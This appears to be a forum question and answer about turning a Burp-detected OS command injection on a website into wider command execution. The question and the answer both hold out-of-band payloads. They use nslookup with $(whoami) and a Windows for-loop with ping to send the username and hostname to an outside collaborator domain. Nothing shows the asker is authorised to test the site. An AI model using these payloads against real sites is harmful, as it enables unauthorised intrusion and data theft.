# out-of-band data exfiltration Command Injection

Tags: security, code-injection, commandinjection

A few days ago I found a vulnerability in a site of interest through burp suite scanner using nslookup xxx.burpcolaborator.com exploit with the following feature

Issue: OS command injection
Severity: High
Confidence: Certain

[image]

the vulnerability only responds when using ` and only responds to the nslookup, sleep and ping including the burp colaborator.

[image]

[image]

These are the only commands it respond to.

`nslookup xxx.burpcolaborator.com`
`ping xxx.burpcolaborator.com`
`sleep 10`

other commands like `nslookup $(whoami).xxx.burp collaborator.com` They do not give any answer, please I would appreciate it if you could help me with this problem since I cannot find a way to exploit this vulnerability and I want it to execute other commands apart from nslookup or sleep.

I await your response.
Thanx

Answer (score -1):

Seems like it it could be Windows which is why `$()` wouldn't work. Maybe try:

```
for /f %i in ('hostname') do ping %i.burpid.burpcolaborator.com
```